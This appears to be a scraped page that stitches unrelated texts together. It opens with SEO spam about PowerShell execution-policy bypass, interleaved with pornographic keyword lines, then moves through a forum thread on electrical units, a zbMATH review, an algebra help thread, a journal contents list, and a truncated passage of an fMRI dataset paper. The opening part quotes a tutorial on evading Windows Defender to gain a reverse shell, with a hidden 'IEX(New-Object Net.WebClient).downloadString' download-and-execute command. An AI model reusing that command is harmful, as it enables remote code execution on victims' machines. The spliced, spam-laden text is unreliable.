Write the PowerShell commands you want to run to a file. The C# uninstall hook will read these commands and execute them inside a Pipeline Execute uninstallUtil.exe on the exe from step 2 using a. Closest solution I've found for this is running the following line in powershell as admin which will execute the script and bypass the restrictions: powershell.exe -executionpolicy unrestricted C:\multitool.ps1 If anyone has a cleaner solution that can run the script from the bat file I would greatly appreciate it. Share Improve this answer. Powershell Bypass Command will sometimes glitch and take you a long time to try different solutions. LoginAsk is here to help you access Powershell Bypass Command quickly and handle each specific case you encounter. Furthermore, you can find the “Troubleshooting Login Issues” section which can answer your unresolved problems and equip you with a lot of relevant. 2016. 10. 10. · Executing Command line: “C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe” -NoLogo -NonInteractive -ExecutionPolicy Bypass C:\WINDOWS\ccmcache\157\Install.ps1 with user context. So by the looks of things it seems that the client setting can’t apply the Execution policy without having.
2 I would like to run powershell with a hidden window. I use this script but the window still appear: powershell.exe -ExecutionPolicy ByPass -WindowStyle Hidden -NonInteractive -NoLogo -File "C:\test.ps1" How can I modify the code to run powershell without window? powershell window Share Improve this question asked Apr 6, 2018 at 11:04 Lobi 65 4 10. 2020. 6. 2. · The objective of this tutorial is to bypass windows defender with a little bit of social engineering and gain a reverse shell. So first we need to somehow perform social engineering and drop a bat file on victims’ computer. ... powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).downloadString.
male to female transformation services las vegas
power automate check if filter array is empty
9 years ago
girl fucking fish video
Security warning for downloaded scripts ^. This is the message you will see even if your PowerShell ExecutionPolicy is set to Unrestricted if you start a script that you downloaded from the Internet: Security warning Run only scripts that you trust. While scripts from the internet can be useful, this script can potentially harm your computer. The first is the -ExecutionPolicy Bypass string. This will ensure your PowerShell execution policy doesn't prevent your script from running. ... Set args = Wscript.Arguments For Each arg In args objShell.Run("powershell -windowstyle hidden -executionpolicy bypass -noninteractive ""&"" ""'" & arg & "'"""),0 Next and then call the powershell.
single phase watt hour meter landisgyr
8 years ago
asian tits and ass
I have a powershell script and I don't want to change the ExecutionPolicy on my machine. When I run PS command line and type the following command: powershell -ExecutionPolicy ByPass -File test.ps1. the script will run but I dont know how to add this command into my powershell script because I want to run it from context (linke in image) menu.
7 years ago
will a sig 365x fit in a p365 holster
-W Hidden - shorthand for "-WindowStyle Hidden", which indicates that the PowerShell session window should be started in a hidden manner. -Exec Bypass - shorthand for "-ExecutionPolicy Bypass", which disables the execution policy for the current PowerShell session (default disallows execution).
holly sonders nude pictures
1 year ago
xbox com errorhelp
Once the command prompt is open, type PowerShell. To start the PowerShell ISE in the following os Windows® 7, Windows Server® 2008 R2, and Windows Server® 2008. Open the command prompt by pressing winkey + R. Type Cmd. Once the command prompt is open, type PowerShell_ISE. Instead of PowerShell_ISE, ISE alone can be used.
celebrity porn free
|
|
# From where do we get Volt unit? why 1 volt not 1 s/e =1.4 v?
Status
Not open for further replies.
#### Hishamsaleh
##### Full Member level 1
I was wondering why do we use Amper, volt, farad, etc... units???? what is the thing or the experiment that let us know that this quantity of capacitance (for example) is 1 unit of farad!!!! i think it must be like meter unit.. it's the wave length of something that gives light with this length as i remember!! that's ok... but how about farad? Amper? volt? from where do we know it?
i'll be thanks if you have information about it....
also where can we find 1 ohm in nature??? what is our reference??? is it like bar???
#### flatulent
hundred years ago
All of this goes back for at lest a hundred or two years. There were several unit systems used by different science and technology areas. There were many conferences starting near 1900 on making a universal set of units. These discussions also included wheterr 2 pi should be in E&M equations or not by changing the definition of physical constants. Finally around 1960 or so the SI unit system was universally adopted even thoug the electric and magnetic units were not compatible.
#### Hishamsaleh
##### Full Member level 1
ok that's gr8... thanks a lot...
sorry if i wasn't clear enough... but what I mean is:
(for example)
what is Pi?
to answer w must know that Pi=22/7... so what's 22/7? from where did we get this number? ok... pi tends to the ratio between (outer length of a cyrcle) / (diameter of this cyrcle)... so, for each 7 units of diameter lengh we know that the outer length of this cyrcle must be 22 unit...
hope you get my point!
my question is:
from where did we get:
1-Volt
2-ohm
3-Amper
|
|
# zbMATH — the first resource for mathematics
Canonical filtrations and stability of direct images by Frobenius morphisms. (English) Zbl 1201.14030
Summary: We study the stability of direct images by Frobenius morphisms. First, we compute the first Chern classes of direct images of vector bundles by Frobenius morphisms modulo rational equivalence up to torsions. Next, introducing the canonical filtrations, we prove that if $$X$$ is a nonsingular projective minimal surface of general type with semistable $$\varOmega_X^1$$ with respect to the canonical line bundle $$K_X$$, then the direct images of line bundles on $$X$$ by Frobenius morphisms are semistable with respect to $$K_X$$.
##### MSC:
14J60 Vector bundles on surfaces and higher-dimensional varieties, and their moduli 13A35 Characteristic $$p$$ methods (Frobenius endomorphism) and reduction to characteristic $$p$$; tight closure 14J29 Surfaces of general type
Full Text:
##### References:
[1] P. Deligne and N. Katz, Groupes de monodromie en géométrie algébrique. II, Séminaire de Géométrie Algébrique du Bois-Marie 1967–1969 (SGA 7 II), Lecture Notes in Mathematics, Vol. 340, Springer-Verlag, Berlin-New York, 1973. [2] P. Deligne and L. Illusie, Relèvements modulo $$p^2$$ et décomposition du complexe de De Rham, Invent. Math. 89 (1987), 247–270. · Zbl 0632.14017 [3] T. Ekedahl, Canonical models of surfaces of general type in positive characteristic, Inst. Hautes études Sci. Publ. Math. 67 (1988), 97–144. · Zbl 0674.14028 [4] W. Fulton, Intersection theory Second edition, Ergebnisse der Mathematik und ihrer Grenzgebiete. 3. Folge. A Series of Modern Surveys in Mathematics [Results in Mathematics and Related Areas. 3rd Series. A Series of Modern Surveys in Mathematics], 2., Springer-Verlag, Berlin, 1998. · Zbl 0885.14002 [5] D. Gieseker, Stable vector bundles and the Frobenius morphism, Ann. Sci. école Norm. Sup. (4) 6 (1973), 95–101. · Zbl 0281.14013 [6] D. Huybrechts and M. Lehn, The geometry of moduli spaces of sheaves, Aspects Math. E31, Friedr. Vieweg & Sohn, Braunschweig, 1997. · Zbl 0872.14002 [7] S. Ilangovan, V. B. Mehta and A. J. Parameswaran, Semistability and semisimplicity in representations of low height in positive characteristic, A tribute to C. S. Seshadri (Chennai, 2002), 271–282, Trends Math., Birkhäuser, Basel, 2003. · Zbl 1067.20061 [8] K. Joshi, S. Ramanan, E. Xia and J. K. Yu, On vector bundles destabilized by Frobenius pull-back, Compos. Math. 142 (2006), 616–630. · Zbl 1101.14049 [9] N. M. Katz, Nilpotent connections and the monodromy theorem: Applications of a result of Turrittin, Inst. Hautes études Sci. Publ. Math. 39 (1970), 175–232. · Zbl 0221.14007 [10] K. Kurano, The singular Riemann-Roch theorem and Hilbert-Kunz functions, J. Algebra 304 (2006), 487–499. · Zbl 1109.13015 [11] H. Lange and C. Pauly, On Frobenius-destabilized rank-2 vector bundles over curves, arXiv.math.AG/0309456 v2, (2005). · Zbl 1157.14017 [12] A. Langer, Semistable sheaves in positive characteristic, Ann. of Math. (2) 159 (2004), 251–276. · Zbl 1080.14014 [13] V. B. Mehta and C. Pauly, Semistability of Frobenius direct images over curves, arXiv.math.AG/0607565 v1, (2006). · Zbl 1201.14021 [14] A. Noma, Stability of Frobenius pull-backs of tangent bundles of weighted complete intersections, Math. Nachr. 221 (2001), 87–93. · Zbl 0992.14016 [15] J. P. Serre, Sur la semi-simplicité des produits tensoriels de représentations de groupes, Invent. Math. 116 (1994), 513–530. · Zbl 0816.20014 [16] N. I. Shepherd-Barron, Unstable vector bundles and linear systems on surfaces in characteristic $$p$$, Invent. Math. 106 (1991), 243–262. · Zbl 0769.14006 [17] N. I. Shepherd-Barron, Geography for surfaces of general type in positive characteristic, Invent. Math. 106 (1991), 263–274. · Zbl 0813.14025 [18] N. I. Shepherd-Barron, Semi-stability and reduction mod $$p$$, Topology 37 (1998), 659–664. · Zbl 0926.14021 [19] X. Sun, Stability of direct images under Frobenius morphism, arXiv.math.AG/0608043 v2, (2006).
This reference list is based on information provided by the publisher or from digital mathematics libraries. Its items are heuristically matched to zbMATH identifiers and may contain data conversion errors. It attempts to reflect the references listed in the original paper as accurately as possible without claiming the completeness or perfect precision of the matching.
|
|
# Math Help - Help with work problem/formula
1. ## Help with work problem/formula
I am stuck on a word problem and can't figure out what formula to use. I know to use x for one price and y for another, but after that I'm hitting a wall.
There were 383 tickets sold to a basketball game. The ticket price for event card holders is $1.75 and$2.25 for non-card holders. The total amount collected was $806.25. How many tickets were sold at each price? 2. Event card holders = x Non-Card holders = y $x + y = 383$ (as 383 were sold in total) $1.75x + 2.25y = 806.25$ (as the price for x was$1.75 and y was $2.25, and$806.25 was the total raised)
Can you take it from here? Rearrange to get in terms of x or y, then Substitute or eliminate as you see fit.
3. I actually got that far, but I can't seem to get the same answer as the book. I know the answer is 111 tix at 1.75 and 272 at 2.25 but I don't see how they are getting it. Do I need to multiply by 100 to get rid of the decimals? My answers are way off.
4. From eq1: $y = 383-x$
Sub into eq2: $1.75x+2.25(383-x) = 806.25$. Once x is known use either equation to find y.
I get the book's answer of 111 and 272
5. Thanks! I knew I'd feel stupid once I seen the answer. I can't believe I didn't catch that.
|
|
### Contents of Journal of Mechanical Engineering 52, 1 (2001)
L. STAREK: Inverse eigenvalue problem in vibration of mechanical
systems (Review paper) (in Slovak) 1
B. SAMANTA, K. R. AL-BALUSHI: Use of wavelet transforms and neural
network in gear fault diagnosis 21
CZ. J. JERMAK, M. RUCKI: Pneumatic injector as a length measuring
sensor 32
M. WIECZOROWSKI: Optical followers -- their fidelity in surface
topography measurements 39
I. BALLO: Some remarks on the sky-hook and ground-hook concepts
(Letter to the Editor) (in Slovak) 55
# Abstracts
### Inverse eigenvalue problem in vibration of mechanical systems
L. STAREK
This paper reviews recent literature on inverse eigenvalue problem in vibration relating to the reconstruction or estimation of the physical properties of mechanical systems from a knowledge of (some of) their spectral and/or modal data. The review takes into account exclusively linear systems (small vibration of mechanical systems). The paper deals with various types of vibrating systems: continuous and discrete, damped and undamped, the various types of data (spectral and/or modal, complete or incomplete).
### Use of wavelet transforms and neural network in gear fault diagnosis
B. SAMANTA, K. R. AL-BALUSHI
A procedure for fault diagnosis of gears by wavelet transforms and artificial neural network (ANN) is presented. The time domain acoustic emission (AE) signals of a rotating machine with normal and defective gears are processed by wavelet transform and decomposed in terms of low-frequency (approximate) and high-frequency (detailed) components. The extracted features from the wavelet transform are used as inputs to an ANN based diagnostic approach. The ANN is trained using the back-propagation algorithm with a subset of the experimental data for known machine conditions and tested using the remaining set of data. The procedure is illustrated through the experimental acoustic emission signals of a gearbox.
### Pneumatic injector as a length measuring sensor
CZ. J. JERMAK, M. RUCKI
In the article, the new construction of the pneumatic measuring gauge is described. It is based on the injection phenomenon in particular position of the nozzles. Comparing with other injectors it is simple and its static metrological properties are good. Substantial influence on the properties has distance L between nozzles and the angle \alpha between nozzle head surface and its axis. The best metrological characteristics were reached for configuration of L = 4 mm and \alpha \in (-45o, 5o). The usage of pressured air is decreased, too.
### Optical followers - their fidelity in surface topography measurements
M. WIECZOROWSKI
In the paper author presents a comparison analysis of three different probes used for surface topography measurement. Skid and skidless stylus probes were used as contact pick-ups, while an optical autofocussing pick-up was applied as a non-contact one. The analysis was performed using several different topography parameters. It showed that a skid causes some relatively small distortions as far as the surface representation is concerned. On the other hand, the optical probe proved to be a very difficult measuring tool, particularly for surfaces with steep slopes and sharp edges. Yet even for very smooth surfaces a great attention must be paid while measuring with this kind of pick-up is considered.
|
|
Thank you for visiting nature.com. You are using a browser version with limited support for CSS. To obtain the best experience, we recommend you use a more up to date browser (or turn off compatibility mode in Internet Explorer). In the meantime, to ensure continued support, we are displaying the site without styles and JavaScript.
# Individual Brain Charting dataset extension, second release of high-resolution fMRI data for cognitive mapping
## Abstract
We present an extension of the Individual Brain Charting dataset –a high spatial-resolution, multi-task, functional Magnetic Resonance Imaging dataset, intended to support the investigation on the functional principles governing cognition in the human brain. The concomitant data acquisition from the same 12 participants, in the same environment, allows to obtain in the long run finer cognitive topographies, free from inter-subject and inter-site variability. This second release provides more data from psychological domains present in the first release, and also yields data featuring new ones. It includes tasks on e.g. mental time travel, reward, theory-of-mind, pain, numerosity, self-reference effect and speech recognition. In total, 13 tasks with 86 contrasts were added to the dataset and 63 new components were included in the cognitive description of the ensuing contrasts. As the dataset becomes larger, the collection of the corresponding topographies becomes more comprehensive, leading to better brain-atlasing frameworks. This dataset is an open-access facility; raw data and derivatives are publicly available in neuroimaging repositories.
Measurement(s) functional brain measurement • regional part of brain • brain measurement • cognition Technology Type(s) functional magnetic resonance imaging Factor Type(s) type of task Sample Characteristic - Organism Homo sapiens
Machine-accessible metadata file describing the reported data: https://doi.org/10.6084/m9.figshare.12958181
## Background & Summary
Understanding the fundamental principles that govern human cognition requires mapping the brain in terms of functional segregation of specialized regions. This is achieved by measuring local differences of brain activation related to behavior. Functional Magnetic Resonance Imaging (fMRI) has been used for this purpose as an attempt to better understand the neural correlates underlying cognition. However, while there is a rich literature concerning performance of isolated tasks, little is still known about the overall functional organization of the brain.
Meta- and mega-analyses constitute active efforts at providing accumulated knowledge on brain systems, wherein data from different studies are pooled to map regions consistently linked to mental functions1,2,3,4,5,6,7,8,9 Because data are impacted by both intra- and inter-subject plus inter-site variability, these approaches still limit the exact demarcation of functional territories and, consequently, formal generalizations about brain mechanisms. Several large-scale brain-imaging datasets are suitable for atlasing, wherein differences can be mitigated across subjects and protocols together with standardized data-processing routines. Yet, as they have different scopes, not all requirements are met for cognitive mapping. For instance, the Human Connectome Project (HCP)10,11 and CONNECT/Archi12,13 datasets provide large subject samples as they are focused in population analysis across different modalities; task-fMRI data combine here 24 and 28 conditions, respectively, which is scarce for functional atlasing. Another example is the studyforrest dataset14,15,16,17, that includes a variety of task data on complex auditory and visual information, but restricted to naturalistic stimuli. Additionally, one shall note that within-subject variability reduces task-fMRI replicability; thus, more data per subject can in fact facilitate reliability of group-level results18.
To obtain as many cognitive signatures as possible and simultaneously achieve a wide brain coverage at a fine scale, extensive functional mapping of individual brains over different psychological domains is necessary. Within this context, the Individual Brain Charting (IBC) project pertains to the development of a 1.5mm-resolution, task-fMRI dataset acquired in a fixed environment, on a permanent cohort of 12 participants. Data collection from a broad range of tasks, at high spatial resolution, yields a sharp characterization of the neurocognitive components common to the different tasks. This extension corresponds to the second release of the IBC dataset, meant to increase the number of psychological domains of the first one19. It both aims at a consistent mapping of elementary spatial components, extracted from all tasks, and a fine characterization of the individual architecture underlying this topographic information.
Here, we give an account –focused on the second release– of the experimental procedures and the dataset organization and show that raw task-fMRI data and their derivatives represent functional activity in direct response to behavior. Data collection is ongoing and more releases are planned for the next years. Despite being a long-term project, IBC is not dedicated to longitudinal surveys; acquisitions of the same tasks will not be conducted systematically.
The IBC dataset is an open-access facility devoted to providing high-resolution, functional maps of individual brains as basis to support investigations in human cognition.
## Methods
To avoid ambiguity with MRI-related terms used throughout this manuscript, definitions of such terms follow the Brain-Imaging-Data-Structure (BIDS) Specification version 1.2.122.
Complementary information about dataset organization and MRI-acquisition protocols can be found in the IBC documentation available online: https://project.inria.fr/IBC/data/
### Participants
The present release of the IBC dataset consists of brain fMRI data from eleven individuals (one female), acquired between April 2017 and July 2019. The two differences from the cohort of the first release are: (1) the replacement of participant 2 (sub-02) by participant 15 (sub-15); and (2) the absence of data from participant 8 (sub-08). Regarding the latter, data will be acquired in the future and included in one of the upcoming releases.
Age, sex and handedness of this group of participants is given on Table 1. Handedness was determined with the Edinburgh Handedness Inventory23.
All experimental procedures were approved by a regional ethical committee for medical protocols in Île-de-France (“Comité de Protection des Personnes” - no. 14-031) and a committee to ensure compliance with data-protection rules (“Commission Nationale de l’Informatique et des Libertés” - DR-2016-033). They were undertaken with the informed written consent of each participant according to the Helsinki declaration and the French public health regulation. For more information, consult19.
## Materials
### Stimulation
For all tasks (see Section “Experimental Paradigms” for details), the stimuli were delivered through custom-made scripts that ensure a fully automated environment and computer-controlled collection of the behavioral data. Two software tools were used for the development of such protocols: (1) Expyriment (versions 0.7.0 and 0.9.0, Python 2.7); and (2) Psychophysics Toolbox Version 3 for GNU Octave version 4.2.1. The visual and auditory stimuli presented in the Theory-of-Mind and Pain Matrices battery as well as in the Bang task (see respectively Sections “Theory-of-Mind and Pain Matrices task battery” and task “Bang task” for details) were translated into French. The corresponding material is publicly available, as described in Section “Code Availability”.
### MRI Equipment
The fMRI data were acquired using an MRI scanner Siemens 3 T Magnetom Prismafit along with a Siemens Head/Neck 64-channel coil. Behavioral responses were obtained with two MR-compatible, optic-fiber response devices that were interchangeably used according to the type of task employed: (1) a five-button ergonomic pad (Current Designs, Package 932 with Pyka HHSC-1 × 5-N4); and (2) a pair of in-house custom-made sticks featuring one-top button. MR-Confon package was used as audio system in the MRI environment.
All sessions were conducted at the NeuroSpin platform of the CEA Research Institute, Saclay, France.
## Experimental Procedure
Upon arrival to the research institute, participants were instructed about the execution and timing of the tasks referring to the upcoming session.
All sessions were composed of several runs dedicated to one or a group of tasks as described in Section “Experimental Paradigms”. The structure of the sessions according to the MRI modality employed at every run is detailed in Table 2. Specifications about imaging parameters of the referred modalities as well as procedures undertaken toward recruitment of participant 15 plus handling and training of all participants are described in19. As a side note, data pertaining to tasks of the first release were also acquired for participant 15.
Tasks were aggregated in different sessions according to their original studies24,25,26,27,28,29,30,31,32,33. Most of the paradigms are composed by trials usually separated by the display of a fixation cross. All trials within each task were randomized in order to avoid the extensively consecutive repetition of trials containing conditions of the same kind. For some tasks, trials were in fact pseudo-randomized by following specific criteria relative to the experimental design of those tasks.
The following sections are thus dedicated to a full description of the set of paradigms employed for each task, including description of the experimental conditions, temporal organization of the trials and their (pseudo-)randomization. Moreover, Table 3 provides an overview of the tasks, which includes a short description and motivation of their inclusion in terms of psychological domains covered. Ideally and as mentioned in Section “Background and Summary”, the main purpose of each release is to provide the dataset with a greater variety of cognitive modules from as many new psychological domains as possible, at the same time that a better coverage with the already existing ones is also attained.
All material used for stimulus presentation have been made publicly available (see Section “Code Availability”), together with video annotations of the corresponding protocols. Video annotations refer to video records of complete runs that are meant to be consulted for a better comprehension of the task paradigms. For each subject, the paradigm-descriptors’ files describing the occurrence of the events are part of the dataset, following BIDS Specification.
### Mental time travel (MTT) task battery
The Mental Time Travel (MTT) task battery was developed following previous studies conducted at the NeuroSpin platform on chronosthesia and mental space navigation24,25,26. In these studies, participants judged the ordinality of real historical events in time and space by mentally project oneself, i.e. through egocentric mapping. In contrast, the present task was intended to assess the neural correlates underlying both mental time and space judgment involved in allocentric mapping implemented in narratives. To this end, and in order to remove confounds associated with prior subject-specific mental representations linked to the historical events, fictional scenarios were created with fabricated stories and characters.
Concretely, this battery is composed of two tasks –MTT WE and MTT SN– that were employed, each of them, in two different sessions. The stimuli of each task referred to a different island plotting different stories and characters. There were two stories per island and they were created based on a two-dimensional mesh of nodes. Each node corresponded to a specific action. The stories of each island evolved both in time and in one single cardinal direction. The cardinal directions, cued in the task, differed between sessions. Thus, space judgment was performed according to the cardinal directions West-East and South-North for tasks MTT WE and MTT SN, respectively. In addition, the stories of each island evolved spatially in opposite ways. For instance, the two stories plotted in the West-East island evolved across time from west to east and east to west, respectively.
Prior to each session, participants were to learn the story of the corresponding session. To prevent any retrieval of graphical memories referring to the schematic representation of the stories, they were presented as audio narratives. Additionally, the participants were also instructed to learn the stories chronographically, i.e. as they were progressively referred to in the narrative, and to refrain from doing (visual) notes, which could be encoded as mental judgments.
The task was organized as a block-design paradigm, composed of trials with three conditions of audio stimuli: (1) Reference, statement of an action in the story to serve as reference for the time or space judgment in the same trial; (2) Cue, question concerning the type of mental judgment to be performed in the same trial, i.e. “Before or After?” for the time judgment or “West or East?” and “South or North?” for the space judgment in the first and second sessions, respectively; and (3) Event, statement of an action to be judged with respect to the Reference and according to the Cue.
Every trial started with an audio presentation of the Reference followed by silence, with a duration of two and four seconds, respectively. The audio presentation of the Cue came next, followed by a silence period; they had respectively a duration of two and four seconds. Afterwards, a series of four Events were presented for two seconds each; all of them were interspersed by a Response condition of three seconds. Every trial ended with a silent period of seven seconds, thus lasting thirty nine seconds in total.
A black fixation cross was permanently displayed on the screen across conditions and the participants were instructed to never close their eyes. At the very end of each trial, the cross turned to red during half of a second in order to signal the beginning of the next trial; such cue facilitated the identification of the next audio stimulus as the upcoming Reference to be judged.
During the Response period, the participants had to press one of the two possible buttons, placed in their respective left and right hand. If the Cue presented in the given trial hinted at time judgment, the participants were to judge whether the previous Event occurred before the Reference, by pressing the button of the left hand, or after the Reference, by pressing the button of the right hand. If the Cue concerned with space judgment, the participants were to judge, in the same way, whether the Event occurred west or east of the Reference in the first session and south or north of the Reference in the second session.
One session of data collection comprised three runs; each of them included twenty trials. Half of the trials for a given run were about time navigation and the other half, space navigation. Five different references were shared by both types of navigation and, thus, there were two trials with the same reference for each type of navigation. Within trials, half of the Events related to past or western/southern actions and the other half to future or eastern/northen actions with respect to the Reference.
The order of the trials was shuffled within runs, only to ensure that each run would feature a unique sequence of trials according to type of reference (both in time and space) and cue. No pseudo-randomization criterion was imposed as the trials’ characterization was already very rich. Since there were only two types of answers, we also randomized events according to their correct answer within each trial. The same randomized sequence for each run was employed for all participants. The code of this randomization is provided together with the protocol of the task in a public repository on GitHub (see Section “Code Availability”). Note that the randomized sequence of trials for all runs is pre-determined and, thus, provided as inputs to the protocol for a specific session.
For sake of clarity, Online-only Table 1 contains a full description of all conditions employed in the experimental design of this task.
The Preference task battery was adapted from the Pleasantness Rating task (Study 1a) described in27, in order to capture the neural correlates underlying decision-making for potentially rewarding outcomes (aka “positive-incentive value”) as well as the corresponding level of confidence.
The whole task battery is composed of four tasks, each of them pertaining to the presentation of items of a certain kind. Therefore, Food, Painting, Face and House tasks were dedicated to “food items”, “paintings”, “human faces” and “houses”, respectively.
All tasks were organized as a block-design experiment with one condition per trial. Every trial started with a fixation cross, whose duration was jittered between 0.5 seconds and 4.5 seconds, after which a picture of an item was displayed on the screen together with a rating scale and a cursor. Participants were to indicate how pleasant the presented stimulus was, by sliding the cursor along the scale. Such scale ranged between 1 and 100. The value 1 corresponded to the choices “unpleasant” or “indifferent”; the middle of the scale corresponded to the choice “pleasant”; and the value 100 corresponded to the choice “very pleasant”. Therefore, the ratings related only to the estimation of the positive-incentive value of the items displayed.
One full session was dedicated to the data collection of all tasks. It comprised eight runs with sixty trials each. Although each trial had a variable duration, according to the time spent by the participant in the assessment, no run lasted longer than eight minutes and sixteen seconds. Every task was presented twice in two fully dedicated runs. The stimuli were always different between runs of the same task. As a consequence, no stimulus was ever repeated in any trial and, thus, no item was ever assessed more than once by the participants. To avoid any selection bias in the sequence of stimuli, the order of their presentation was shuffled across trials and between runs of the same type. This shuffle is embedded in the code of the protocol and, thus, the sequence was determined upon launching it. Consequently, the sequence of stimuli was also random across subjects. For each run (of each session), this sequence was properly registered in the logfile generated by the protocol.
### Theory-of-mind and pain matrices task battery
This battery of tasks was adapted from the original task-fMRI localizers of Saxe Lab, intended to identify functional regions-of-interest in the Theory-of-Mind network and Pain Matrix regions. These localizers rely on a set of protocols along with verbal and non-verbal stimuli, whose material was obtained from https://saxelab.mit.edu/localizers.
Minor changes were employed in the present versions of the tasks herein described. Because the cohort of this dataset is composed solely of native French speakers, the verbal stimuli were thus translated to French. Therefore, the durations of the reading period and the response period within conditions were slightly increased.
#### Theory-of-mind localizer (TOM localizer)
The Theory-of-Mind Localizer (TOM localizer) was intended to identify brain regions involved in theory-of-mind and social cognition, by contrasting activation during two distinct story conditions: (1) belief judgments, reading a false-belief story that portrayed characters with false beliefs about their own reality; and (2) fact judgments, reading a story about a false photograph, map or sign28.
The task was organized as a block-design experiment with one condition per trial. Every trial started with a fixation cross of twelve seconds, followed by the main condition that comprised a reading period of eighteen seconds and a response period of six seconds. Its total duration amounted to thirty six seconds. There were ten trials in a run, followed by an extra-period of fixation cross for twelve seconds at the end of the run. Two runs were dedicated to this task in one single session.
The designs, i.e. the sequence of conditions across trials, for two possible runs were pre-determined by the authors of the original study and hard-coded in the original protocol (see Section “Theory-of-Mind and Pain Matrices task battery”). The IBC-adapted protocols contain the exactly same designs. For all subjects, design #1 was employed for the PA-run and design #2 for the AP-run.
### Theory-of-mind and pain-matrix narrative localizer (Emotional Pain localizer)
The Theory-of-Mind and Pain-Matrix Narrative Localizer (Emotional Pain localizer) was intended to identify brain regions involved in theory-of-mind and Pain Matrix areas, by contrasting activation during two distinct story conditions: reading a story that portrayed characters suffering from (1) emotional pain and (2) physical pain29.
The experimental design of this task is identical to the one employed for the TOM localizer, except that the reading period lasted twelve seconds instead of eighteen seconds. Two different designs were pre-determined by the authors of the original study and they were employed across runs and participants, also in the same way as described for the TOM localizer (see Section “Theory-of-Mind Localizer (TOM localizer)”).
### Theory-of-mind and pain matrix movie localizer (Pain Movie localizer)
The Theory-of-Mind and Pain Matrix Movie Localizer (Pain Movie localizer) consisted in the display of “Partly Cloud”, a 6-minute movie from Disney Pixar, in order to study the responses implicated in theory-of-mind and pain-matrix brain regions29,30.
Two main conditions were thus hand-coded in the movie, according to30, as follows: (1) mental movie, in which characters were experiencing changes in beliefs, desires, and/or emotions; and (2) physical pain movie, in which characters were experiencing physical pain. Such conditions were intended to evoke brain responses from theory-of-mind and pain-matrix networks, respectively. All moments in the movie not focused on the direct interaction of the main characters were considered as a baseline period.
### Visual short-term memory (VSTM) and enumeration task battery
This battery of tasks was adapted from the control experiment described in31. They were intended to investigate the role of the Posterior Parietal Cortex (PPC) involved in the concurrent processing of a variable number of items. Because subjects can only process three or four items at a time, this phenomenon may reflect a general mechanism of object individuation34,35. On the other hand, PPC has been implicated in studies of capacity limits, during Visual Short-Term Memory (VSTM)36 and Enumeration35. While the former requires high encoding precision of items due to their multiple features, like location and orientation, the latter requires no encoding of object features. By comparing the neural response of the PPC with respect to the two tasks, the original study demonstrated a non-linear increase of activation, in this region, along with the increasing number of items. Besides, this relationship was different in the two tasks. Concretely, PPC activation started to increase from two items onward in the VSTM task, whereas such increase only happened from three items onward in the Enumeration task.
For both tasks, the stimuli consisted of sets of tilted dark-gray bars displayed on a light-gray background. Additionally, minor changes were employed in their present versions herein described: (1) both the response period and the period of the fixation dot at the end of each trial were made constant in both tasks; and (2) for the Enumeration task, answers were registered via a button-press response box instead of an audio registration of oral responses as in the original study.
### Visual short-term memory task (VSTM)
In the VSTM task, participants were presented with a certain number of bars, varying from one to six.
Every trial started with the presentation of a black fixation dot in the center of the screen for 0.5 seconds. While still on the screen, the black fixation dot was then displayed together with a certain number of tilted bars –variable between trials from one to six– for 0.15 seconds. Afterwards, a white fixation dot was shown for 1 second. It was next replaced by the presentation of the test stimulus for 1.7 seconds, displaying identical number of tilted bars in identical positions together with a green fixation dot. The participants were to remember the orientation of the bars from the previous sample, and answer with one of the two possible button presses, depending on whether one of the bars in the current display had changed orientation by 90 °, which was the case in half of the trials. The test display was replaced by another black fixation dot for a fixed duration of 3.8 seconds. Thus, the trial was 7.15 seconds long. There were 72 trials in a run and four runs in one single session. Pairs of runs were launched consecutively. To avoid selection bias in the sequence of stimuli, the order of the trials was shuffled according to numerosity and change of orientation within runs and across participants.
In the Enumeration task, participants were presented with a certain number of bars, varying from one to eight.
Every trial started with the presentation of a black fixation dot in the center of the screen for 0.5 seconds. While still on the screen, the black fixation dot was then displayed together with a certain number of tilted bars –variable between trials from one to eight– for 0.15 seconds. It was followed by a response period of 1.7 s, in which only a green fixation dot was being displayed on the screen. The participants were to remember the number of the bars that were shown right before and answer accordingly, by pressing the corresponding button. Afterwards, another black fixation dot was displayed for a fixed duration of 7.8 seconds. The trial length was thus 9.95 seconds. There were ninety six trials in a run and two (consecutive) runs in one single session. To avoid selection bias in the sequence of stimuli, the order of the trials was shuffled according to numerosity within runs and across participants.
The Self task was adapted from the study32, originally developed to investigate the Self-Reference Effect in older adults. This effect pertains to the encoding mechanism of information referring to the self, characterized as a memory-advantaged process. Consequently, memory-retrieval performance is also better for information encoded in reference to the self than to other people, objects or concepts.
The present task was thus composed of two phases, each of them relying on encoding and recognition procedures. The encoding phase was intended to map brain regions related to the encoding of items in reference to the self, whereas the recognition one was conceived to isolate the memory network specifically involved in the retrieval of those items. The phases were interspersed, so that the recognition phase was always related to the encoding phase presented immediately before.
The encoding phase had two blocks. Each block was composed of a set of trials pertaining to the same condition. For both conditions, a different adjective was presented at every trial on the screen. The participants were to judge whether or not the adjective described themselves –self-reference encoding condition– or another person –other-reference encoding condition. The other person was a public figure in France around the same age range as the cohort, whose gender matched the gender of every participant. Two public figures were mentioned, one at the time, across all runs; four public figures –two of each gender– were selected beforehand. By this way, we ensured that all participants were able to successfully characterize the same individuals, holding equal the levels of familiarity and affective attributes with respect to these individuals.
In the recognition phase, participants were to remember whether or not the adjectives had also been displayed during the previous encoding phase. This phase was composed of a single block of trials, pertaining to three categories of conditions. New adjectives were presented during one half of the trials whereas the other half were in reference to the adjectives displayed in the previous phase. Thus, trials referring to the adjectives from “self-reference encoding” were part of the self-reference recognition category and trials referring to the “other-reference encoding” were part of the other-reference recognition category. Conditions were then defined according to the type of answer provided by the participant for each of these categories (see Online-only Table 1 for details).
There were four runs in one session. The first three ones had three phases; the fourth and last run had four phases (see Table 2). Their total durations were twelve and 15.97 seconds, respectively. Blocks of both phases started with an instruction condition of five seconds, containing a visual cue. The cue was related to the judgment that should be performed next, according to the type of condition featured in that block. A set of trials, showing different adjectives, were presented afterwards. Each trial had a duration of five seconds, in which a response was to be provided by the participant. During the trials of the encoding blocks, participants had to press the button with their left or right hand, depending on whether they believed or not the adjective on display described someone (i.e. self or other, respectively for “self-reference encoding” or “other-reference encoding” conditions). During the trials of the recognition block, participants had to answer in the same way, depending on whether they believed or not the adjective had been presented before. A fixation cross was always presented between trials, whose duration was jittered between 0.3 seconds and 0.5 seconds. A rest period was introduced between encoding and recognition phases, whose duration was also jittered between ten and fourteen seconds. Long intervals between these two phases, i.e. longer than ten seconds, ensured the measurement of long-term memory processes during the recognition phase, at the age range of the 